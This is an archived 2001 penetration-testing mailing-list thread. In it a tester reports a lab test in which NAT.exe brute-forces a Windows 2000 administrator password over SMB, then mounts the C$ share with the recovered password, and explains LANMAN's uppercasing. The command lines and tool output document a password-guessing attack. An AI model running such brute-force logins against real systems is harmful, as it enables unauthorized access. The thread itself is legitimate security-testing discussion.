Penetration Testing mailing list archives

Re: Using Null Session information from NAT.EXE

From: "bluefur0r bluefur0r" <bluefur0r () drea ms>
Date: 1 Nov 2001 20:19:27 -0000

Ahh that is correct capitals do count when using the command line net use. Although authenticating with the Network 
browser does not. Also one thing i've encountered a lot is after you authenticate to one host, then attempt to 
authenticate to another you get "conflicting credentials." To fix this (without rebooting) in 2k just go to 
Administrative Tools -> Services -> Workstation and restart the service. This will kill computer browser as well. But 
hey it's better than rebooting. Just thought I'd share.
blue

Be careful after i did this a couple of times rather quickly, it completely bombed my computer browser service and I 
couldn't get it back up without a reboot. But if you take your time it works quite well.

Op Thu, 01 Nov 2001 13:36:15 -0500 Windex King <WindexKing () mor-lan-d com> geschreven:

Ian,

I have tested a hunch I had about this and I 
believe this is the answer you're looking for.

Attacking machine: NT 4.0 SP6a
Attacked machine:  W2K no SP

First I confirmed the administrator password 
on the to be attacked machine.

C:\>net user administrator "WindexKing"
The command completed successfully.

** Note: pwd contains capital letters W and K **

Then I attacked using NAT.exe

C:\>nat -o WindexKing.log -u administrator.txt -p WindexKing.pwd 192.168.68.33
[*]--- Reading usernames from administrator.txt
[*]--- Reading passwords from WindexKing.pwd

[*]--- Checking host: 192.168.68.33
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Thu Nov 01 07:49:30 2001
[*]--- Timezone is UTC-5.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `foo'
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `bar'
[*]--- Attempting to connect with Username: `AdminIstrator' Password: `windexking'
[*]--- CONNECTED: Username: `AdminIstrator' Password: `windexking'

Now I tried to use the password found by NAT.exe via net.exe

c:\>net use * \\192.168.68.33\c$ "windexking" /u:administrator
System error 1326 has occurred.

Logon failure: unknown user name or bad password.


c:\>net use * \\192.168.68.33\c$ "WindexKing" /u:administrator
Drive E: is now connected to \\192.168.68.33\c$.

The command completed successfully.


My conclusion:

NAT.exe is forcing LANMAN only authentication and therefore the 
letters taken from the supplied wordlist are converted to uppercase
as LANMAN expects.

NAT.exe doesn't tell you that (other than the "Attempting to connect 
with protocol: MICROSOFT NETWORKS 1.03" line) and simply reports the
word from the wordlist which worked as it is presented in the wordlist.

You can find a Cygwin compiled version of the SAMBA SMBclient at:
http://www.hoobie.net/tools/index.html

W      K

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


=================================================================
Kies een origineel e-mailadres op www.emails.nl

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Re: Using Null Session information from NAT.EXE bs (Nov 01)
- <Possible follow-ups>
- Re: Using Null Session information from NAT.EXE Tom Fischer (Nov 01)
  - RE: Using Null Session information from NAT.EXE Pierre Kroma (Nov 03)
- Re: Using Null Session information from NAT.EXE Windex King (Nov 01)
  - How to sniff packets from afar? Shawn Duffy (Nov 05)
    - Re: How to sniff packets from afar? Penetration Testing (Nov 08)
    - Re: How to sniff packets from afar? ET LoWNOISE (Nov 08)
    - Re: How to sniff packets from afar? Dug Song (Nov 08)
- Re: Using Null Session information from NAT.EXE bluefur0r bluefur0r (Nov 03)
- Re: Using Null Session information from NAT.EXE H Carvey (Nov 05)